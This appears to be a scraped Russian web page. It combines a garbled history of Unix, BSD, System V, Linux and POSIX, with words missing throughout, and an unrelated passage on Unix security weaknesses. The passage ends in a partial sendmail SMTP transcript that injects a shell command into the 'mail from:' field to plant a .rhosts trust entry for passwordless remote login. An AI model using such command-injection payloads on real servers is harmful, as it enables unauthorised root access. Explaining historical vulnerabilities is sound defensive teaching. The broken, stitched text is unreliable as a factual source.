Операционная Система Unix
Posted : admin On 25.07.2019Генеалогическое древо Unix-систем Unix («UNIX» является зарегистрированной торговой маркой организации ) — семейство, и, которые основаны на идеях оригинального проекта Unix, разработанного в 1970-х годах в исследовательском центре Кеном Томпсоном, Деннисом Ритчи и другими. Операционные системы семейства Unix характеризуются модульным дизайном, в котором каждая задача выполняется отдельной утилитой, взаимодействие осуществляется через единую, а для используется.
- Операционные Системы Windows
- Операционная Система Unix Реферат
- Операционная Система Unix 2 Издание Pdf
История появления операционной системы Unix. Перекомпиляция Unix в коды любой аппаратной. Jump to Хронология основных событий в истории ОС UNIX - Первая версия UNIX Time-Sharing. Язык C создавался для разработки ОС UNIX.
Идеи, заложенные в основу Unix, оказали огромное влияние на развитие компьютерных операционных систем. В настоящее время Unix-системы признаны одними из самых исторически важных ОС. Логотип UNIX. Первая система Unix была разработана в подразделении компании. С тех пор было создано большое количество различных Unix-систем. Юридически право называться «UNIX» имеют лишь те операционные системы, которые прошли сертификацию на соответствие стандарту.
Остальные же, хотя и используют сходные концепции и технологии, называются ( Unix-like). Для краткости, в данной статье под Unix-системами подразумеваются как истинные Unix, так и Unix-подобные. Особенности Основное отличие Unix-подобных систем от других операционных систем заключается в том, что это изначально многопользовательские многозадачные системы.
В Unix может одновременно работать сразу много людей, каждый за своим, при этом каждый из них может выполнять множество различных вычислительных процессов, которые будут использовать ресурсы именно этого компьютера. Вторая колоссальная заслуга Unix — в её мультиплатформенности.
Ядро системы разработано таким образом, что его легко можно приспособить практически под любой микропроцессор. Unix имеет и другие характерные особенности:. использование простых для настройки и управления системой;. широкое применение утилит, запускаемых из;.
взаимодействие с пользователем посредством виртуального устройства — терминала;. представление физических и виртуальных устройств и некоторых средств межпроцессового взаимодействия в виде;. использование из нескольких программ, каждая из которых выполняет одну задачу.
Применение В настоящее время Unix-системы распространены в основном среди, а также как встроенные системы для различного оборудования, включая. Среди ОС для и домашнего применения Unix и Unix-подобные ОС занимают после второе , третье и многие последующие места по популярности. История Предшественники. Варианты Unix по годам В в была начата работа по созданию операционной системы для внутренних нужд. Под руководством была создана система. Впоследствии он возглавил проект, а затем стал главой информационного подразделения Bell Labs.
В появились компьютеры третьего поколения, для которых возможности BESYS уже не подходили. Высотский и его коллеги приняли решение не разрабатывать новую собственную операционную систему, а подключиться к Multics — совместному проекту. Телекоммуникационный гигант, в состав которого входила Bell Labs, оказал проекту существенную поддержку, но в вышел из него, поскольку проект не приносил финансовых выгод. Первые Unix-системы. И — создатели Unix Первоначально Unix была разработана в конце сотрудниками Bell Labs, в первую очередь,. В Кен Томпсон, стремясь реализовать идеи, которые были положены в основу Multics, но на более скромном аппаратном обеспечении (DEC ), написал первую версию новой операционной системы для этих мини-компьютеров 70-х (в его аналоги, выпускавшиеся, были известны как и «», позже, производились в, ). Эта версия получила название «первая редакция» ( Edition 1) и была первой официальной версией.
Системное время все реализации Unix. Первые версии Unix были написаны на и не имели встроенного. Примерно в 1969 году Кен Томпсон при содействии Денниса Ритчи разработал и реализовал язык (B), представлявший собой упрощённый (для реализации на мини-компьютерах) вариант разработанного в языка. Би, как и BCPL, был языком.
В 1972 году была выпущена вторая редакция Unix, переписанная на языке Би. В 1969—1973 гг. На основе Би был разработан компилируемый язык, получивший название (C). В вышла третья редакция Unix со встроенным компилятором языка Си. Того же года появилась четвёртая редакция, с переписанным на Си (в духе системы Multics, также написанной на языке высокого уровня ), а в — пятая редакция, полностью переписанная на Си. С Unix стал распространяться среди университетов и академических учреждений.
С началось появление новых версий, разработанных за пределами Bell Labs, и рост популярности системы. В том же 1975 году Bell Labs выпустила шестую редакцию, известную по широко разошедшимся. К система была установлена более чем на 600 машинах, прежде всего, в университетах. Седьмая редакция была последней единой версией Unix. Именно в ней появился близкий к современному интерпретатор. Раскол В начале компания AT&T, которой принадлежала Bell Labs, осознала ценность Unix и начала создание версии ОС. Эта версия, поступившая в продажу в, носила название UNIX System III и была основана на седьмой версии системы.
Однако компания не могла напрямую начать развитие Unix как коммерческого продукта из-за запрета, наложенного правительством США. Вынудило AT&T подписать соглашение, компании заниматься деятельностью, не связанной с телефонными и телеграфными сетями и оборудованием.
Для того чтобы всё-таки иметь возможность перевести Unix в ранг коммерческих продуктов, компания передала исходный код операционной системы некоторым высшим учебным заведениям, лицензировав код под очень либеральными условиями. В декабре одним из первых исходные коды получил.
С начинает свою историю, созданный в университете Беркли. Его первая версия была основана на шестой редакции. В выпущена новая версия, названная 3BSD, основанная на седьмой редакции.
BSD поддерживал такие полезные свойства, как и замещение страниц по требованию. Автором BSD был. Важной причиной раскола Unix стала реализация. До этого межмашинное взаимодействие в Unix пребывало в зачаточном состоянии — наиболее существенным способом связи был (средство копирования файлов из одной Unix-системы в другую, изначально работавшее по телефонным сетям с помощью ). Было предложено два интерфейса программирования сетевых приложений: Berkley sockets ( ) и TLI ( Transport Layer Interface). Интерфейс Berkley sockets был разработан в университете Беркли и использовал стек протоколов, разработанный там же.
TLI был создан AT&T в соответствии с определением транспортного уровня и впервые появился в системе System V версии 3. Хотя эта версия содержала TLI и потоки, первоначально в ней не было реализации TCP/IP или других сетевых протоколов, но подобные реализации предоставлялись сторонними фирмами. Реализация TCP/IP официально и окончательно была включена в базовую поставку System V версии 4.
Это, как и другие соображения (по большей части, рыночные), вызвало окончательное размежевание между двумя ветвями Unix — (университета Беркли) и (коммерческая версия от AT&T). Впоследствии, многие компании, лицензировав System V у AT&T, разработали собственные коммерческие разновидности Unix, такие как,. В середине была выпущена версия BSD 4.2, поддерживающая работу в сетях. Система стала весьма популярной. Между 1983 и в BSD было добавлено много новых возможностей, таких как ядра, сетевая файловая система, виртуальная файловая система, и существенно улучшены возможности работы с файловыми сетями. Тем временем AT&T выпускала новые версии своей системы, названной System V. В 1983 была выпущена версия 1 (SVR1 — System V Release 1), включавшая полноэкранный текстовый редактор, библиотеку, кеширование.
Версия 2 (SVR2), выпущенная в, реализовывала монопольный доступ к файлам (file locking), доступ к страницам по требованию (demand paging), (copy-on-write). Версия 3 вышла в и включала, среди прочего, TLI, а также систему поддержки удалённых файловых систем. Версия 4 (SVR4), разработанная в сотрудничестве с фирмой и вышедшая 18 октября, поддерживала многие возможности BSD, в частности TCP/IP, новый командный интерпретатор. Кроме того, там было много других добавлений, таких как, командный интерпретатор, сетевая файловая система (заимствованная у ) и т. Современные реализации Unix, как правило, не являются системами V или BSD в чистом виде. Они реализуют возможности как System V, так и BSD. Свободные Unix-подобные операционные системы.
Основная статья: В объявил о создании проекта — попытки создания Unix-подобной операционной системы с нуля, без использования оригинального. Большая часть программного обеспечения, разработанного в рамках данного проекта, — такого как, (стандартная библиотека языка ) и — играет ключевую роль в других свободных операционных системах.
Однако работы по созданию замены для Unix, необходимые для полного выполнения задач GNU, продвигались крайне медленно. В настоящее время — попытка создать современное ядро на основе архитектуры — всё ещё далека от завершения. В, когда опубликовал ядро и привлёк помощников, использование инструментов, разработанных в рамках проекта GNU, было очевидным выбором. Операционная система и ядро Linux вместе составляют ОС, известную, как. Этой системы (такие как и ), включающие ядро, утилиты GNU и дополнительное программное обеспечение стали популярными как среди любителей, так и среди представителей.
В начале вышел дистрибутив, основанный на дистрибутиве Networking Release 2, распространяемый компанией за $995 с «ужасающей скидкой» в 99% по сравнению с ценой System V. Подала иск против BSDI, а затем против, допустившего распространение файлов Unix в исходных и двоичных форматах фактически за бесценок, что подрывало бизнес самой USL.
Весь 1992 год никаких значительных успехов в судебной тяжбе для USL не принёс, зато появился встречный иск. К началу 1993 года дистрибутив 386/BSD поменял своё название. В декабре 1993 года появился другой дистрибутив —, нацеленный на простых пользователей. После приобретения USL компанией к лету 1993 года начались переговоры по урегулированию статуса кодов BSD. К январю 1994 и Novell договорились удалить три файла из 18000 Networking Release 2, часть файлов должна быть подвергнута правке, а к примерно 70 файлам университет должен был добавить информацию о копирайте USL. В июне вышел «чистый» выпуск.
Вот с этого момента группы BSDI, NetBSD и FreeBSD должны были повторно синхронизировать свои версии систем с «чистой» системой 4.4BSD-Lite. Таким образом, все наработки, сделанные за три года с момента подачи иска USL, пришлось пересматривать на предмет нарушения авторских прав и использования стороннего кода. Переписывать важные составляющие ядра и операционного окружения. Значительно позднее выделились в самостоятельные проекты,.
В фирма искала основу для своей новой операционной системы, и выбрала — операционную систему со свободно распространяемым ядром, разработанную фирмой. В выпускает открытую -совместимую операционную систему. Она совмещает код, написанный самой Apple, с полученным от, и прочих свободных проектов.
Darwin представляет собой набор основных компонентов, используемых. Он совместим с третьей версией (SUSv3) и POSIX-приложениями и утилитами. 14 июня был открыт исходный код операционной системы. Этот проект, как и созданная на его основе операционная система, получили название. 17 июня, через три дня после открытия кода, был создан дистрибутив. В мае 2008 появился первый официальный дистрибутив OpenSolaris 2008.05.
Существует более десяти дистрибутивов на основе OpenSolaris, наиболее известные из них —. В настоящий момент GNU/Linux и представители семейства BSD быстро отвоёвывают рынок у коммерческих Unix-систем и одновременно проникают как на настольные компьютеры конечных пользователей, так и на мобильные и встраиваемые системы. Проприетарные системы После разделения компании AT&T Unix и права на оригинальный неоднократно меняли владельцев, в частности, они длительное время принадлежали компании. В Novell передала права на товарный знак и на сертификацию программного обеспечения на соответствие этому знаку консорциуму, который затем объединился с Open Software Foundation, образовав консорциум. Он объединяет ведущие компьютерные корпорации и государственные организации, в том числе, и многие другие. Консорциум занимается разработкой открытых стандартов в области операционных систем, самым важным из которых является, ранее известный как. С точки зрения The Open Group, название UNIX могут носить только системы, прошедшие сертификацию на соответствие Single UNIX Specification.
В Novell продала права на существующие лицензии и дальнейшую разработку System V компании en. В Santa Cruz Operation продала свой Unix-бизнес компании, которая затем была переименована. Хотя это название похоже на аббревиатуру SCO, используемую Santa Cruz Operation, это две разные компании. SCO Group заявила, что она также обладает правами на исходный код Unix и развернула кампанию против различных пользователей и поставщиков Unix-подобных систем, требуя выплаты лицензионных отчислений. Однако Novell утверждает, что права на исходный код не были переданы Santa Cruz Operation и, таким образом, не перешли к SCO Group, а остаются у Novell, что и подтвердил вердикт суда. Несмотря на это в отменил вынесенное ранее решение, назначив дополнительное расследование с целью установления законного владельца авторских прав на исходные тексты операционной системы. В июне 2010 года суд поставил точку в этом вопросе, подтвердив вынесенный ранее (в апреле 2010) очередной вердикт в пользу Novell и отказав SCO Group в рассмотрении дальнейших жалоб.
Влияние Unix на эволюцию операционных систем Unix-системы имеют большую историческую важность, поскольку благодаря им распространились некоторые популярные сегодня концепции и подходы в области ОС. Также, в ходе разработки Unix-систем был создан язык. Как и, Unix была написана на языке высокого уровня, а не на (доминировавшем в то время). Она содержала значительно упрощённую, по сравнению с предшествующими ей операционными системами, модель. Включала как службы, так и устройства (такие как, и ) и предоставляла внешне единообразный к ним, но дополнительные механизмы работы с устройствами (такие как и биты доступа) не вписывались в простую модель «поток байтов». Unix популяризовала предложенную в Multics идею иерархической файловой системы с произвольной глубиной вложенности.
Другие операционные системы (в том числе DOS) того времени позволяли разбивать дисковое пространство на каталоги или разделы, но число уровней вложенности было фиксировано и, зачастую, уровень вложенности был только один. Позднее все основные фирменные операционные системы обрели возможность создания рекурсивных подкаталогов, также заимствованную из Multics. То, что стал просто одной из пользовательских, а в качестве дополнительных команд выступают отдельные программы, является ещё одной инновацией Multics , популяризированной Unix. Язык командной оболочки Unix используется пользователем как для интерактивной работы, так и для написания, то есть не существует отдельного языка описания заданий, как, например, в системе фирмы. Так как оболочка и команды операционной системы являются обычными программами, пользователь может выбирать их в соответствии со своими предпочтениями, или даже написать собственную оболочку. Наконец, новые команды можно добавлять к системе без перекомпиляции.
Новый, предложенный в командной строке Unix, способ создания цепочек программ, последовательно обрабатывающих данные, способствовал использованию параллельной обработки данных. Существенными особенностями Unix были полная ориентация на текстовый и предположение, что размер кратен восьми битам. Первоначально в Unix не было даже редакторов двоичных файлов — система полностью конфигурировалась с помощью текстовых команд. Наибольшей и наименьшей единицей ввода-вывода служил текстовый, что полностью отличало ввод-вывод Unix от ввода-вывода других операционных систем, ориентированного на работу с записями. Ориентация на использование текста для представления всего, что только можно, сделала полезными т. ( pipelines).
Ориентация на текстовый восьмибитный байт сделала Unix более и переносимой, чем другие операционные системы. Со временем текстовые приложения одержали победу и в других областях, например, на уровне, таких как, и других. Unix способствовала широкому распространению, которые были впервые реализованы в текстовом редакторе для Unix. Возможности, предоставляемые Unix-программам, стали основой стандартных интерфейсов операционных систем. Широко используемый в системном программировании язык, созданный изначально для разработки Unix, превзошёл Unix по популярности. Язык Си был первым «веротерпимым» языком, который не пытался навязать программисту тот или иной стиль программирования.
Си был первым высокоуровневым языком, предоставляющим доступ ко всем возможностям процессора, таким как, и т. С другой стороны, свобода языка Си приводила к ошибкам в таких функциях стандартной библиотеки Си, как.
Результатом стали многие печально известные уязвимости, например, та, что эксплуатировалась в знаменитом. Первые разработчики Unix способствовали внедрению принципов модульного программирования и в инженерную практику. Unix предоставлял возможность использования протоколов на сравнительно недорогих компьютерах, что привело к быстрому росту. Это, в свою очередь, способствовало быстрому обнаружению нескольких крупных уязвимостей в системе безопасности, архитектуре и системных утилитах Unix. Со временем ведущие разработчики Unix разработали культурные нормы разработки программного обеспечения, которые стали столь же важны, как и сам Unix. ( ) Одними из самых известных примеров Unix-подобных ОС являются,. Социальная роль в сообществе ИТ-профессионалов и историческая роль.
Добавьте, в противном случае он может быть удалён. Дополнительные сведения могут быть. (10 июля 2011) Первоначальные Unix работали на крупных многопользовательских компьютерах, к которым также предлагались и проприетарные ОС от производителя оборудования, такие как и её потомок. Невзирая на то, что по ряду мнений тогдашний Unix имел недостатки по сравнению с данными ОС (например, отсутствие серьёзных движков баз данных), он был: а) дешевле, а иногда и бесплатен для академических учреждений б) был портируем с оборудования на оборудование, и разработан на портируемом языке Си, что «отвязывало» разработку программ от конкретной аппаратуры.
Кроме того, «отвязанным» от аппаратуры и производителя оказался и опыт пользователя — человек, работавший с Unix на VAX, легко работал с ней же и на 68xxx, и так далее. Производители аппаратуры в то время часто прохладно относились к Unix, считая её игрушечной, и предлагая свою проприетарную ОС для серьёзной работы — в первую очередь СУБД и основанных на них бизнес-приложений в коммерческих структурах.
Известны комментарии по этому поводу от по поводу её. К этому прислушивались корпорации, но не академическая среда, которая имела всё для себя необходимое в Unix, зачастую не требовала официальной поддержки от производителя, справляясь своими силами, и ценила дешевизну и переносимость Unix. Таким образом, Unix была едва ли не первой на разную аппаратуру ОС. Вторым резким взлётом Unix было появление -процессоров около 1989 года. Ещё до того существовали т.
Workstations — персональные однопользовательские компьютеры большой мощности, имеющие достаточный объём памяти, жёсткого диска и достаточно развитую ОС (многозадачность, защита памяти) для работы с серьёзными приложениями, такими, как CADы. Среди производителей таких машин выделялась компания, сделавшая себе на них имя. До появления RISC-процессоров в этих станциях обычно использовался процессор, тот же, что и в компьютерах фирмы (хотя и под более развитой операционной системой, чем у Apple). Около 1989 года на рынке появились коммерческие реализации процессоров RISC-архитектуры.
Логичным решением ряда компаний (Sun и других) был перенос Unix на эти архитектуры, что немедленно повлекло за собой и перенос всей экосистемы ПО для Unix. Проприетарные серьёзные ОС, такие как VMS, начали свой закат именно с этого момента (даже если и удалось перенести на RISC саму ОС, всё было намного сложнее с приложениями под неё, которые в этих экосистемах зачастую разрабатывались на ассемблере или же на проприетарных языках типа BLISS), и Unix стал ОС для самых мощных компьютеров в мире. Однако в это время экосистема начала переходить на в лице. Огромные преимущества GUI, а также, например, унифицированная поддержка всех типов принтеров, были оценены и разработчиками, и пользователями. Это сильно подорвало позиции Unix на рынке PC — реализации такие, как и, не справлялись с поддержкой Windows-приложений. Что же касается GUI для Unix, называемого (были и иные реализации, много менее популярные), то он не мог полноценно работать на обычной пользовательской PC ввиду требований к памяти — для нормальной работы X11 требовалось 16 МБ, в то время как Windows 3.1 с достаточной производительностью исполняла и Word, и Excel одновременно в 8 МБ (это было стандартным размером памяти PC в то время). При высоких ценах на память это было лимитирующим фактором.
Успех Windows дал импульс внутреннему проекту Microsoft под названием, которая была совместима с Windows по API, но при этом имела всё те же архитектурные особенности серьёзной ОС, что и Unix — многозадачность, полноценную защиту памяти, поддержку многопроцессорных машин, права доступа к файлам и директориям, системный журнал. Также Windows NT представила журнальную файловую систему, которая по возможностям на тот момент превышала все стандартно поставляемые с Unix файловые системы — аналоги под Unix были только отдельными коммерческими продуктами от и других.
Хотя Windows NT и не была популярна первоначально, из-за высоких требований к памяти (те же 16 МБ), она позволила Microsoft выйти на рынок решений для, например,. Многие в то время не верили в возможность Microsoft, традиционно специализирующейся на настольном ПО, быть игроком на рынке ПО масштаба предприятия, где уже были свои громкие имена, такие как Oracle и Sun. К этому сомнению добавлялся тот факт, что СУБД Microsoft — — начинался как упрощённая версия Sybase SQL Server, лицензированная у Sybase и на 99% совместимая по всем аспектам работы с ним. Во второй половине 1990-х годов Microsoft начал теснить Unix и на рынке корпоративных серверов. Совокупность вышеперечисленных факторов, а также обвал цен на, ставшими из профессионального оборудования домашним, по сути убила само понятие workstation к началу 2000-х годов.
Кроме того, системы Microsoft проще в управлении, особенно в типовых сценариях использования. Излишне говорить, что всё это не добавило положительных эмоций Unix-сообществу, а коммерческие Unix-системы от производителей аппаратуры, такие как Solaris, оказались просто под угрозой. Но в данный момент начался третий резкий взлёт Unix. Ещё в конце 80-х годов подытожил те неформальные практики в отношении прав на ПО, что существовали в академической среде (откуда вышли и первоначальные поклонники Unix) и по сути являлись производными от принятых в этой среде прав на научные открытия и изобретения. Результатом явилась лицензия. Кроме того, Столлман и его товарищи, прекрасно понимая, что для успеха не завязанного на корпорации программного обеспечения необходимы не проприетарные средства разработки, разработал набор для различных , что вместе с разработанными ранее утилитами GNU (замена стандартных утилит Unix) составило необходимый и достаточно мощный пакет программ для разработчика. Для создания Unix не хватало по сути только.
И оно было разработано финским студентом Линусом Торвальдсом. Ядро было разработано «с нуля» и не является с точки зрения исходного кода ни BSD, ни System V (хотя концепты таки заимствовались, например, Linux имел функции namei и bread), однако по ряду нюансов (системные вызовы, богатая /proc, отсутствие sysctk) — больше тяготеет к последней. Первоначально был в достаточной степени неразвитым и примитивным проектом. Однако он верно нашёл для себя нишу, сначала как учебного Unix (замена Таненбаума), а затем — как раз тогда началось активное развитие Интернета —. Серьёзным конкурентом Linux на тот момент была, однако «соборный» стиль управления разработкой в противовес «базарному» стилю Linux, а также куда большая техническая архаичность в таких вопросах, как поддержка многопроцессорных машин и форматы исполняемых файлов, сильно замедлила развитие FreeBSD по сравнению с Linux, сделав последний флагманом мира свободного ПО.
В дальнейшем Linux достигал всё новых и новых высот:. перенос серьёзных проприетарных продуктов, таких как;. серьёзный интерес к этой экосистеме как основе для своих вертикальных решений;. появление аналогов почти всех привычных программ из мира Windows;.
отказ некоторых производителей оборудования от обязательной предустановки Windows;. выпуск с одной лишь Linux;. использование в качестве ядра. На настоящий момент Linux является заслуженно популярной ОС для серверов, хотя и куда менее популярной на рабочих столах. Некоторые архитектурные особенности ОС Unix Особенности Unix, отличающие данное семейство от других ОС приведены ниже. Файловая система древовидная, чувствительная к регистру символов в именах, очень слабые ограничения на длину имён и пути. Нет поддержки структурированных файлов ядром ОС, на уровне системных вызовов файл есть поток байтов.
Командная строка находится в адресном пространстве запускаемого процесса, а не извлекается системным вызовом из процесса интерпретатора команд (как это происходит, например, в ). Понятие «». Запуск процессов вызовом fork, то есть возможность клонирования текущего процесса со всем состоянием. Понятия stdin/stdout/stderr. Ввод-вывод только через. Традиционно крайне слабая поддержка, по сравнению с VMS и Windows NT.
есть обыкновенное приложение, общающееся с ядром обыкновенными системными вызовами (в и интерпретатор команд выполнялся как специальное приложение, специальным образом размещённое в памяти, пользующееся специальными системными вызовами, поддерживались также системные вызовы, дающие возможность приложению обращаться к своему родительскому интерпретатору команд). Команда командной строки есть не более чем имя файла программы, не требуется специальная регистрация и специальная разработка программ как команд (что являлось обычной практикой в, ). Не принят подход с программой, задающей пользователю вопросы о режимах своей работы, вместо этого используются параметры командной строки (в, программы работали также с командной строкой, но при её отсутствии выдавали запрос на ввод параметров). Пространство имён устройств на диске в каталоге /dev, поддающееся управлению администратором, в отличие от подхода Windows, где это пространство имён размещается в памяти ядра, и администрирование этого пространства (например, задание прав доступа) крайне затруднено из-за отсутствия его постоянного хранения на дисках (строится каждый раз при загрузке). Широкое использование текстовых файлов для хранения настроек, в отличие от двоичной базы данных настроек, как, например, в Windows.
Широкое использование утилит обработки текста для выполнения повседневных задач под управлением скриптов. «Раскрутка» ОС после загрузки ядра путём исполнения скриптов стандартным интерпретатором команд. Широкое использование. Все процессы, кроме, равны между собой, не бывает «специальных процессов». Адресное пространство делится на глобальное для всех процессов ядро и на локальную для процесса части, нет «групповой» части адресного пространства, как в и Windows NT, как и возможности загрузки туда кода и его исполнения там. Использование двух уровней привилегий процессора вместо четырёх. Отказ от использования в пользу деления программы на несколько программ поменьше, общающихся через именованные каналы или временные файлы.
Отсутствие и аналогов, то есть произвольных (а не жёстко перечисленных в стандартном множестве) сигналов, не доставляемых до явного пожелания процесса их получить (Windows, ). Концепция уникальна для Unix, и крайне сложна в переносе на другие ОС, такие как Windows. Стандарты. Также: Большое количество разных вариантов системы Unix привело к необходимости стандартизовать её средства, чтобы упростить переносимость приложений и избавить пользователя от необходимости изучать особенности каждой разновидности Unix. С этой целью ещё в была создана пользовательская группа. Первые стандарты были разработаны в 1984—1985 гг.
Одним из самых первых стандартов стала спецификация System V Interface Definition (SVID), выпущенная UNIX System Laboratories (USL) одновременно с Release 4. Этот документ, однако, не стал официальным. Наряду с версиями UNIX существовало направление Unix.
Для того, чтобы обеспечить совместимость и, были созданы рабочие группы ( Portable Operating System Interface for UNI X). Существует много стандартов POSIX, однако наиболее известным является стандарт 1003.1-1988, определяющий (API, Application Programming Interface). Он используется не только в Unix, но и в других операционных системах. ( ) В он был принят институтом как IEEE 1003.1-1990, а позднее — ISO/IEC 9945. В настоящее время наиболее важными являются следующие стандарты ( ):.
POSIX 1003.2-1992, определяющий поведение утилит, в том числе командного интерпретатора;. POSIX 1003.1b-1993, дополняющий POSIX 1003.1-1988, — определяет поддержку систем реального времени;. POSIX 1003.1c-1995, дополняющий POSIX 1003.1-1988, — определяет нити (threads), известные также как pthreads. Все стандарты POSIX объединены в документе IEEE 1003. В начале 1990-х годов предложила другой, похожий на POSIX стандарт —, или Spec 1170.
Стандарт приобрёл бо́льшую популярность, чем POSIX, поскольку был доступен бесплатно, в то время как IEEE требовало немалую плату за доступ к своему стандарту. В были начаты работы по объединению данных стандартов. Благодаря этому в настоящее время данные стандарты почти идентичны. Совместный стандарт называется Single UNIX Specification Version 3 и доступен бесплатно в интернете. В целях совместимости несколько создателей Unix-систем предложили использовать — формат систем для двоичных и объектных. Единый формат полностью обеспечивает соответствие двоичных файлов в рамках одной компьютерной архитектуры.
Структура каталогов некоторых систем, в частности, определена в стандарте. Однако, во многих отношениях этот тип стандарта является спорным, и он, даже внутри сообщества GNU/Linux, далеко не универсален. Стандартные команды ОС Unix. Создание и навигация по файлам и каталогам:,. Просмотр и редактирование файлов:,. Обработка текста:,.
Сравнение файлов:,. Разнообразные утилиты командного интерпретатора:,. Системное администрирование:,. Коммуникации:,. Работа с исходным кодом и объектным кодом:,. Сжатие и архивация:,. Работа с двоичными файлами:,.
Ниже приведён список 60 команд из раздела 1 первой версии Unix:.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,. Также в Викиучебнике в Викицитатнике на Викискладе. Примечания. Проверено 16 февраля 2016. Проверено 16 февраля 2016. UNIX изнутри — СПб.: Питер, 2003.
(25.08.09). Проверено 10 июня 2010. 21 августа 2011 года.
(14.06.10). Проверено 14 июня 2010. 22 августа 2011 года.
Проверено 10 июня 2010. 22 августа 2011 года. Литература. Эви Немет, Гарт Снайдер, Трент Хейн, Бэн Уэйли. Unix и Linux: руководство системного администратора, 4-е издание = Unix and Linux System Administration Handbook, 4ed. — М.:, 2011. — 1312 с. —. Робачевский А. М., Немнюгин С.
А., Стесик О. Операционная система UNIX. — 2-е изд. — СПб.:, 2010. — 656 с. — УДК 681.3.06 ББК 32.973.26-018.2. Роберт Шимонски.
Освой самостоятельно Unix. 10 минут на урок = Sams Teach Yourself Unix in 10 Minutes. — М.:, 2006. — С. 272. —. Искусство программирования для Unix = Art of Unix Programming. — М.:, 2005. — С. 544. —. 4-е издание. — 'КУДИЦ-ПРЕСС', 2007. — С. 864. —.
Ссылки Подборка ссылок по теме. в каталоге ссылок (dmoz). Понятие Шепелев В.
Компьютерра (01.06.10). Проверено 10 июня 2010. История. График истории развития Unix-систем. Учебники. С. Центр Информационных Технологий. — учебное пособие.
Проверено 24 июля 2011. 22 августа 2011 года. На английском.
(англ.). (англ.). (англ.).
В условиях современного развития компьютерных и сетевых технологий, операционные системы семейства UNIX на фоне других ОС выглядят более эффективными. Поэтому большинство Сетей (в том числе и банковских) работают под управлением именно этих операционных систем. И как следствие большой интерес к ним хакеров. Хотя число инсталляций UNIX на предприятиях растет, подобные опасения насчет уровня ее безопасности способны задержать распространение этой ОС как среды для исполнения наиболее ответственных приложений. Брешь в защите корпоративной сети может обернуться для компании потерей миллионов долларов и, что еще более важно, подрывом доверия со стороны клиентов и партнеров. Помимо свободного доступа хакеров к исходному тексту UNIX многих беспокоит и необходимость искать квалифицированных специалистов по обеспечению ее защиты.
В то же время специалисты по информационной безопасности утверждают, что несмотря на некоторые инциденты, UNIX не более уязвима, чем любая другая коммерческая ОС. Более того, открытость UNIX не снижает уровень защищенности ОС, а, напротив, способствует его повышению, благодаря придирчивому изучению исходных текстов широким кругом вполне «благонадежных» специалистов и оперативному выявлению ими недостатков во всех аспектах, включая безопасность.
Обнаруженные дефекты можно оперативно устранить с помощью быстро появляющихся бесплатных «заплаток». Проведенное в 1999 г. Сравнение сроков устранения ошибок, обнаруженных в системах фирм Microsoft, Sun и Red Hat, показало, что дистрибьютор бесплатной операционной системы затратил на это почти на 5% меньше времени, чем Microsoft В дополнение ко всему, многие крупные независимые разработчики ПО уже начали переносить на платформу UNIX свои коммерческие средства обеспечения безопасности. По мнению экспертов, это позволит принять стандартные меры противодействия угрозам безопасности, предусматривающие обучение персонала, использование «правильных» инструментов защиты, а также регулярное отслеживание рекомендаций экспертов и обновление версий ПО. Каждая компьютерная система нуждается в защите от не имеющих права на доступ пользователей, получающих доступ к компьютеру, дискам и системным файлам. Возможности безопасности, присутствующие в системе, представляют расширение к основным возможностям безопасности операционных систем UNIX.
Операционная система разрабатывается, чтобы удовлетворить требованиям класса доверия С2, как определено Критериями оценки компьютерной системы доверия отдела защиты. Так как нет компьютерных систем, которые полностью свободны от риска, то системы относят по «доверию», а не по «безопасности».
Именно это подразумевается С2 классом «доверия». «Доверенная» система это система, которая достигает специфического уровня контроля за доступом к информации, обеспечивая механизм предотвращения (или наконец, определения) неавторизованного доступа.
Возможности безопасности операционной системы являются расширением возможностей, присутствующих у типичных, менее «доверенных» систем UNIX. Полная совместимость с существующими механизмами UNIX поддерживается с расширением защиты пользователей и системной безопасности. Большая часть системной администрации включает поддержку и защиту системной информации. После установки и разблокировки контроля система принимает в конфигурацию чтобы функционировать в » доверенном » состоянии. В этом состоянии только определенный администратор может иметь доступ к системной информации. Когда система переходит в нормальному функционированию, доверенное состояние системы должно поддерживаться если необходимо иметь полные преимущества доверенных возможностей. Если следовать этому руководству, то системная информация останется защищенной.
Причины уязвимости UNIX. Здесь описываются вполне понятные причины, по которым, тем не менее, происходит до 90% всех случаев вскрытия UNIXхостов.
Наличие демонов. Механизм SUID/SGIDпроцессов. Эти механизмы, являющиеся неотъемлемой частью идеологии UNIX, были и будут лакомым кусочком для хакеров, т. В этом случае пользователь всегда взаимодействует с процессом, имеющим большие привилегии, чем у него самого, и поэтому любая ошибка или недоработка в нем автоматически ведет к возможности использования этих привилегий. Излишнее доверие. Об этом уже достаточно говорилось выше.
Повторим, что в UNIX достаточно много служб, использующих доверие, и они могут тем или иным способом быть обмануты. К этим трем причинам нельзя не добавить следующую: 4. Человеческий фактор с весьма разнообразными способами его проявления от легко вскрываемых паролей у обычных пользователей до ошибок у квалифицированных системных администраторов, многие из которых как раз и открывают путь для использования механизмов доверия. Нельзя приуменьшать роль человека при обеспечении безопасности любой системы. Возможно, он даже является слабейшим звеном.
Про необходимость выбора надежных паролей уже говорилось. Неправильное администрирование — такая же актуальная проблема. Но за все надо платить, и это обратная сторона переносимости и гибкости UNIX. Более того, если говорить о слабости человека, защищенные системы обычно отказываются и еще от одной из основных идей UNIX наличия суперпользователя, имеющего доступ ко всей информации и никому не подконтрольного. Его права могут быть распределены среди нескольких людей: администратора персонала, администратора безопасности, администратора сети и т.
П., а сам он может быть удален из системы после ее инсталляции. В результате вербовка одного из администраторов не приводит к таким катастрофическим последствиям, как вербовка суперпользователя. Некоторые распространенные хакерские приемы Начать обзор следует с возможности взлома через электронную почту. Для пересылки электронной почты по IP на подавляющем большинстве систем используется программа sendmail, разработанная в университете Беркли.
Задуманная как чисто служебная утилита, эта программа приобрела огромную популярность и вошла в состав дистрибутива многих Unix -систем. Однако она содержала в себе очень серьезную ошибку, благодаря которой любой желающий имел возможность выполнить на удаленной машине команды с привилегиями суперпользователя. Обычно взломщики пытались отправить себе файл passwd для подбора паролей либо помещали свою информацию в файлы, использующиеся программами rlogin, rsh для запуска shell без запроса пароля: ПРИМЕР 1 crack% telnet target.remote.com 25 Connecting to 123.456.654.321.! Соединяемся по порту 25 это SMTP 220 sendmail SMI/4.3.5.2 ready!
Версия, которая как известно, содержит ошибку. Helo xxx 220 Helo xxx, ( crack.edu ) mail from: echo crack.edu/.rhosts@target.remote.com! Подставляем команду вместо обратного адреса. 200 Sender ok. Rcpt to: nosuchuser!
